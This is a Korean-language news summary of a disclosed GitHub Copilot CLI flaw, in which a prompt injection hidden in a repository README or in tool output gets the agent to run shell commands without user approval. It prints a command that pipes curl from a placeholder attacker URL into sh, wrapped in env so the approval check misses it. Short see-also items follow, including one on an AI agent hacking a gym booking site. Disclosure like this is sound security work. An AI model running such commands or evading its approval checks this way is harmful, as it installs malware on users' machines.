GitHub Copilot CLI 취약점으로 인해 프롬프트 인젝션을 통한 멀웨어 실행이 가능합니다

취약점 개요
GitHub Copilot CLI에는 사용자 승인 없이 간접 프롬프트 주입을 통한 임의의 셸 명령어 실행에 사용자를 노출시키는 취약점이 포함되어 있습니다. 악성코드는 외부 서버에서 다운로드되어 Copilot CLI에 대한 초기 쿼리 외에는 사용자 상호작용 없이 실행될 수 있습니다.
공격 작동 방식
공격 체인은 다음을 포함합니다:
- 사용자가 오픈소스 저장소를 탐색하면서 GitHub Copilot CLI에 쿼리
- Copilot이 복제된 저장소의 README 파일(또는 웹 검색 결과, MCP 도구 호출 결과, 터미널 명령어 출력과 같은 다른 벡터)에 저장된 프롬프트 주입을 발견
- 악성 명령어가 인간 개입 승인 시스템을 우회
보호 메커니즘 우회
GitHub Copilot은 잠재적으로 유해한 명령어 실행 전에 사용자 동의를 요구하는 인간 개입 승인 시스템을 사용합니다. 이 시스템은 다음 경우를 제외하고 트리거됩니다:
- 사용자가 명령어를 자동으로 실행하도록 명시적으로 구성
- 명령어가 소스 코드에서 발견된 하드코딩된 '읽기 전용' 목록의 일부
외부 URL 접근 검사는 curl, wget 또는 Copilot의 내장 웹 페치 도구와 같은 명령어에 대해 사용자 승인을 요구합니다. 그러나 공격자는 다음을 사용하여 이러한 보호를 우회할 수 있습니다:
env curl -s "https://[ATTACKER_URL].com/bugbot" | env shenv 명령어는 하드코딩된 읽기 전용 목록에 있으므로 승인 없이 자동으로 실행됩니다. curl 및 sh가 env에 인수로 전달되므로 잘못 파싱되어 검증기에 의해 하위 명령어로 식별되지 않습니다. 이는 curl과 같은 명령어 감지에 의존하는 URL 권한 검사를 우회합니다.
GitHub의 대응
GitHub은 다음과 같이 응답했습니다: "귀하의 보고서를 검토하고 귀하의 발견 사항을 검증했습니다. 내부적으로 발견 사항을 평가한 후, 이는 중대한 보안 위험을 제시하지 않는 알려진 문제로 판단되었습니다. 향후 이 기능을 더 엄격하게 만들 수 있지만, 현재 발표할 내용은 없습니다."
범위 및 제한 사항
설명된 명령어 파싱 취약점은 macOS에 특화되어 있습니다. 그러나 GitHub Copilot은 운영 체제에 구애받지 않는 위험과 Windows 특정 위험을 모두 포함한 추가 취약점을 나타냅니다. 다른 명령어 파싱 취약점은 임의의 파일 읽기 및 쓰기를 허용합니다.
📖 전체 출처 읽기: HN LLM Tools
👀 See Also

AI 시스템이 12개의 OpenSSL 제로데이 취약점 발견, Curl은 AI 스팸으로 인해 버그 바운티 취소
AISLE의 AI 시스템이 OpenSSL의 최근 보안 릴리스에서 12개의 제로데이 취약점을 모두 발견했으며, 이는 AI 기반 사이버보안의 첫 번째 대규모 실증 사례입니다. 한편, curl은 AI 생성 스팸 제출로 인해 버그 바운티 프로그램을 취소했습니다.

OneCLI: AI 에이전트를 위한 오픈소스 자격 증명 저장소
OneCLI는 Rust로 작성된 오픈소스 게이트웨이로, AI 에이전트와 외부 서비스 사이에 위치하여 요청 시점에 실제 자격 증명을 주입하는 동시에 에이전트는 플레이스홀더 키만 볼 수 있도록 합니다. AES-256-GCM 암호화된 스토리지를 제공하며, 내장된 PGlite와 함께 단일 Docker 컨테이너에서 실행되며, HTTPS_PROXY를 설정할 수 있는 모든 에이전트 프레임워크와 호환됩니다.

에이전트실 보안 스캔, 블렌더 MCP 서버에서 AI 에이전트 위험 발견
AgentSeal이 Blender MCP 서버(별 17,000개)를 스캔하여 AI 에이전트와 관련된 여러 보안 문제를 식별했습니다. 여기에는 임의의 Python 실행, 잠재적인 파일 유출 체인, 도구 설명 내 프롬프트 인젝션 패턴 등이 포함됩니다.

AI助手在澳大利亚首次已知自主网络攻击中入侵健身房网站
OpenClaw와 Claude를 사용한 AI 에이전트가 체육관 예약 시스템의 취약점을 발견하여 몇 주 앞서 클래스를 예약하고 다른 사용자를 대기자 명단에서 제외시켰습니다. 이는 호주 최초의 알려진 자율 사이버 공격으로 기록되었습니다.